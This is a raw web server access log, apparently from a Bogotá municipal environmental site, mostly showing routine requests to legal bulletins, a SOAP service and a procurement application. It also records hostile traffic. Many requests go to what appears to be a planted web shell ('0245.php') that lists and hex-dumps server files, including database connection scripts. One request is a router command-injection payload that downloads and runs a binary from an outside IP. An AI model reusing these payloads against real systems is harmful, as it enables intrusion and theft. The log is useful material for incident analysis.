vcK1pimX5S2xwW7nBR5gzTzmyN9mvCbffPj7hcbPzDV684Y/9XIP0ksgeutjA0yHEOZGtSaiE9k07R433sxE0VJWgDCNWiOZV5zZlL+morZRbtVDv8DI2MdtIp2H27BBjamAuITnOSmomp1CYdcW3JQ0cQeB0GJMLGC0DQ8I9NRnHwsuKnfYkYm9b+xa7Zp+7VYjlzkK+taf8l20FM7J9d82CS7lX2cfL0vzMQAA/rO4qJHXMg8W7EPKFNcDYAGbTeH7rKwePFTY4vtoqgehxmMqHUzaWW4loU/7KgnH60Z1Kp5+KIjmuh4Xd52xbsNmQj4zsw5VGrKGSPg79gAJuQEIzjdxztIdBAJSQfG5QU6l8mhHwoTo1GH5R4biAHKGrTE08+T913VSws+lGNUgZTM1u3C/6751mgVdm3tX3CwciRmu4h5MI6ZQTnIpQFG8NXiN9ayDapwWwMo595DTBKObd6Fhqxyp55A4KOhUkQywMj/0sLlKlkUvmgcAifw5jNYmUEtl+MtpyR6xV3d84TNDf0DJHFh82BKn0i3Ks5Ya28eTOGFmRQV/BRr7mpiH/LFOkULFMthqWV8qUHsrltMAl6D+WaoBRxtQ7RryH4jQffvc7usr97ErWm8jD0U9GtQ7njQLBKCc6/qLNuTbEFyjTCPdhp26SCwB4YIOlYNHw8GLQs27+INdSgTcFozzKiuTMYw3PZ4HUVbKOjzcKZVafYCnW/9cFAT8Wdqx6YxZhSlNK0fWnxkQe3MDyN6p70aC69tF4vUonINLwXEzJ+aokbYCUukw/22wosROnPzIvu2OjzAQTHsAKWTpihUOZ9lejikrXCqVuk1i9BccF09LSqAzIZlmtVR4Vi9ScenRZyEyJk6eMQTo+REu/nSpvzqEeERv30wwA+YvhgH5uj8jKbuIV7hxaEo2jDQahhczPRwpNrfStnTt2YScp+PA8/o82TqEPjK4xE1JBkcSJEhdVmEvi0xfjMv51FxI1bHwISJSy345+ix3Sd9or+oxo0RQkxbtYm/tlyNrIfTiBRRgmSQwcaW+AXKnrVFzyIydAHbjans9k0bFlyLZUjtm5TFVok19Kcwt7ZS2CwVAVq2Ihvz31cZpkt8DCNg/BT9QbzElunpsz0S4tEN9dAFzTut+S17rDgsAE5t5KDQobCaz/NizAyG01oFSF7Q2xWgUvtKP46TFEXVYQQwqpHst/5s6htb6EuAbjXIUah0VX9C3Xsfr6HhMXfCIz9yQoUD1RHON+zURK5ftZwZqSAvasq3NdMy/hFTIeffEJWh3W5PfKsGdQc4KPN4n5fNU+QMogOwjIYI2+nrLMxr8DkspKxpr1Pc1wvRYRzXjsTA7nS8e12qbyQg5z9F/2IKgckMr6XXSpB9YgDFXN1BMKjeuww8vmmd93qY2i852HwAynpgMevd3uU8ttzyX7PLtScccU6ordG3+JUVO8k+HxW6bTps&u=U2FsdGVkX191pZTIJX/lZGYA4NkER1q6EiuZdZbMg2LvExFni3SrtLvWL1AbW0BX&y=U2FsdGVkX1+79hPjTeycKAHu4P6N3GmUiAhNbxPT7jDIvaa5fUpNYfOWTd4TxpwV HTTP/1.1" 200 26
172.22.2.4 - - [11/Jul/2024:00:47:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52783
186.102.111.36 - - [11/Jul/2024:00:48:40 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/I/PbBhECnVXjvzYwAGUnrXANeXf+Nwv31g1tTIiy2hIoITpOs1UoTpgMyubIOQONzkQj8Fmrnj7WqCZ5Jzs6L6Jlt3soNJzccdC01tq8BA9oAknZVV42ZlL0Wk3BmAyWUHW4zsEdgG+BD+E+z0zAyE68/An5D6cw=&u=U2FsdGVkX191pZTIJX/lZGYA4NkER1q6EiuZdZbMg2LvExFni3SrtLvWL1AbW0BX&y=U2FsdGVkX1+79hPjTeycKAHu4P6N3GmUiAhNbxPT7jDIvaa5fUpNYfOWTd4TxpwV HTTP/1.1" 200 26
186.102.111.36 - - [11/Jul/2024:00:48:40 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/7xSnxq1LHU1Dk1KDAFZd2kRLbbKJn+cst6PJIJy0y6ZNQO+/ndZVtOBVnvel8hiA3JTaf22UIFiBgtnYBWmJO7qGrgprHjAf6zrNWujAIu800p8KQ6qogJDe7LJH+lCwsQWcFTdD7vT8/GA9OUW4HiWfKOX5QMJE=&u=U2FsdGVkX191pZTIJX/lZGYA4NkER1q6EiuZdZbMg2LvExFni3SrtLvWL1AbW0BX&y=U2FsdGVkX1+79hPjTeycKAHu4P6N3GmUiAhNbxPT7jDIvaa5fUpNYfOWTd4TxpwV HTTP/1.1" 200 26
186.102.111.36 - - [11/Jul/2024:00:48:40 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1++rZNM20NmGgooXZ5+ICKDnAT0cOL5G0NdyN0b47ev3XvG6LeX+Q4lRT+zcsSdfhdWMb8rQ7qQEBq/ZXnrv6yozUGqGIgipoz2rTzoCWBStW8Ptp+gC1PQiVnpuzdyQfx9hnG6LZs2v+2BKKWdWnr3n5kV2weomRU=&u=U2FsdGVkX191pZTIJX/lZGYA4NkER1q6EiuZdZbMg2LvExFni3SrtLvWL1AbW0BX&y=U2FsdGVkX1+79hPjTeycKAHu4P6N3GmUiAhNbxPT7jDIvaa5fUpNYfOWTd4TxpwV HTTP/1.1" 200 26
186.102.111.36 - - [11/Jul/2024:00:48:40 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18YNzg5YIiMoYkflumNzzFyLXMts5vMUmV5glMZhXT5co8nA1lvV51/oMZOzwjQgOk6iQkHiG92S5Eua8eE7EdJNUPv+VCszqPPfAYd2y9uFwvYiAgXk93ut1aFvz4cQcG34PCbLoZ/k+gqaLV0AsdGt5cfA1maXo0l74rzyK2+POnc7eJKSaHP0AjOPTZpU1AGqg1nwFQCdg==&u=U2FsdGVkX191pZTIJX/lZGYA4NkER1q6EiuZdZbMg2LvExFni3SrtLvWL1AbW0BX&y=U2FsdGVkX1+79hPjTeycKAHu4P6N3GmUiAhNbxPT7jDIvaa5fUpNYfOWTd4TxpwV HTTP/1.1" 200 26
47.128.55.104 - - [11/Jul/2024:00:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=error.inc.php&ft=html&white=1 HTTP/1.1" 200 583
47.128.41.86 - - [11/Jul/2024:00:48:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cgis%5C&f=GIS_Geometry.class.php&ft=html&white=1 HTTP/1.1" 200 2394
201.245.192.253 - - [11/Jul/2024:00:48:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.136 - - [11/Jul/2024:00:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringType.int.php&ft=html&white=1 HTTP/1.1" 200 458
47.128.119.185 - - [11/Jul/2024:00:48:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3826.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 1363670
47.128.33.41 - - [11/Jul/2024:00:49:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal%5C&f=conex.php&ft=html&white=1 HTTP/1.1" 200 276
172.22.2.4 - - [11/Jul/2024:00:49:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 304 -
47.128.111.84 - - [11/Jul/2024:00:49:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=upgrade-functions.php&white=1 HTTP/1.1" 200 349
47.128.54.81 - - [11/Jul/2024:00:49:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cforest%5C&f=conex.php&ft=html&white=1 HTTP/1.1" 200 241
47.128.127.199 - - [11/Jul/2024:00:49:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=install.php&white=1 HTTP/1.1" 200 5316
47.128.127.216 - - [11/Jul/2024:00:49:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0924.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 1285655
201.245.192.253 - - [11/Jul/2024:00:49:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.55 - - [11/Jul/2024:00:50:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=mercuryh.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 194608
47.128.34.166 - - [11/Jul/2024:00:43:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=CRRFFS.mp4&ft=info&fullhexdump=1 HTTP/1.1" 200 10281
47.128.116.27 - - [11/Jul/2024:00:50:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=splash-logo.php&ft=html&white=1 HTTP/1.1" 200 256
201.245.192.253 - - [11/Jul/2024:00:50:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [11/Jul/2024:00:50:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.222 - - [11/Jul/2024:00:50:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=Bici_003.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 4218582
216.245.221.92 - - [11/Jul/2024:00:51:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Jul/2024:00:51:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.63.177 - - [11/Jul/2024:00:52:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5C&f=VC_RED.MSI&ft=info&fullhexdump=1 HTTP/1.1" 200 268853
66.249.66.21 - - [11/Jul/2024:00:50:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
66.249.66.19 - - [11/Jul/2024:00:52:35 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/447.pdf HTTP/1.1" 304 -
66.249.66.19 - - [11/Jul/2024:00:52:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
47.128.35.172 - - [11/Jul/2024:00:52:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Clavanderias%5C&f=lavanderias.swf&ft=info&fullhexdump=1 HTTP/1.1" 200 795771
172.22.2.4 - - [11/Jul/2024:00:52:38 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 304 -
47.128.22.29 - - [11/Jul/2024:00:52:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CAceites-Residuos-Estaciones-%5CRegistro+aceite+vegetal+usado%5C&f=Aplicativo.html&ft=html&white=1 HTTP/1.1" 200 276
66.249.69.65 - - [11/Jul/2024:00:52:48 -0500] "GET /cinco-entidades-distritales-fueron-exaltadas-por-sus-buenas-practicas-ambientales.html HTTP/1.1" 304 -
66.249.69.65 - - [11/Jul/2024:00:52:49 -0500] "GET /los-martires- HTTP/1.1" 404 1034
47.128.58.225 - - [11/Jul/2024:00:52:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/server_privileges.php%27%20%20%20%20%20.%20PMA_URL_getCommon(%20%20%20%20%20array(%20%20%20%20%20%27username%27%20=%3E%20%20%20%20$username,%20%20%20%20%20%27hostname%27%20=%3E%20%20%20%20$hostname,%20%20%20%20%20%27dbname%27%20=%3E%20%20%20%20$dbname,%20%20%20%20%20%27tablename%27%20=%3E%20%20%20%20$tablename,%20%20%20%20%20%27revokeall%27%20=%3E%20%20%20%201,%20%20%20%20%20)%20%20%20%20%20)%20%20%20%20%20.%20%27 HTTP/1.1" 403 1006
201.245.192.253 - - [11/Jul/2024:00:52:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [11/Jul/2024:00:53:05 -0500] "GET /Publicaciones/2024EE140457.pdf HTTP/1.1" 200 269612
17.241.227.212 - - [11/Jul/2024:00:53:09 -0500] "GET /semana-bogota-reverdece-135-nuevos-arboles-para-el-humedal-la-conejera.html HTTP/1.1" 200 814
47.128.45.175 - - [11/Jul/2024:00:53:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=media-upload.php&ft=html&white=1 HTTP/1.1" 200 1248
47.128.61.111 - - [11/Jul/2024:00:53:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=shortcodes.php&ft=html&white=1 HTTP/1.1" 200 3637
47.128.35.151 - - [11/Jul/2024:00:53:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+1500-1549.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 8617355
66.249.66.21 - - [11/Jul/2024:00:53:34 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/10339.pdf HTTP/1.1" 200 381895
172.22.2.4 - - [11/Jul/2024:00:51:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.40.175 - - [11/Jul/2024:00:53:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cconfig%5C&f=config_functions.lib.php&ft=html&white=1 HTTP/1.1" 200 655
201.245.192.253 - - [11/Jul/2024:00:53:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [11/Jul/2024:00:54:03 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202024/01484.pdf HTTP/1.1" 200 312975
172.22.2.4 - - [11/Jul/2024:00:52:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
47.128.121.93 - - [11/Jul/2024:00:53:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=spot-invitacion-cabildos.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 8646358
201.245.192.253 - - [11/Jul/2024:00:54:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.116.22 - - [11/Jul/2024:00:50:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestaGente_Corresponsales.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 -
201.245.192.253 - - [11/Jul/2024:00:55:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [11/Jul/2024:00:55:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [11/Jul/2024:00:56:10 -0500] "HEAD / HTTP/1.1" 200 -
45.156.130.30 - - [11/Jul/2024:00:56:10 -0500] "GET / HTTP/1.1" 200 319
66.249.66.19 - - [11/Jul/2024:00:56:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20151-200/00000200.tif HTTP/1.1" 200 353992
201.245.192.253 - - [11/Jul/2024:00:56:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.148.10.251 - - [11/Jul/2024:00:57:20 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
47.128.40.158 - - [11/Jul/2024:00:53:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_Miquitos.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 5570262
181.53.14.143 - - [11/Jul/2024:00:57:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 37977
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:57:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
201.245.192.253 - - [11/Jul/2024:00:57:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.14.143 - - [11/Jul/2024:00:57:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13483
181.53.14.143 - - [11/Jul/2024:00:58:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 121120
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 47203
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:31 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 7051
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 36772
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:40 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21401
181.53.14.143 - - [11/Jul/2024:00:58:41 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21153
181.53.14.143 - - [11/Jul/2024:00:58:42 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 20873
181.53.14.143 - - [11/Jul/2024:00:58:42 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 20873
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 51894
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:49 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 36775
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:58:55 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21157
181.53.14.143 - - [11/Jul/2024:00:58:58 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21029
201.245.192.253 - - [11/Jul/2024:00:58:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.14.143 - - [11/Jul/2024:00:58:59 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21033
181.53.14.143 - - [11/Jul/2024:00:59:00 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21033
181.53.14.143 - - [11/Jul/2024:00:59:07 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 20948
181.53.14.143 - - [11/Jul/2024:00:59:08 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21012
181.53.14.143 - - [11/Jul/2024:00:59:12 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21216
181.53.14.143 - - [11/Jul/2024:00:59:15 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21096
181.53.14.143 - - [11/Jul/2024:00:59:17 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21276
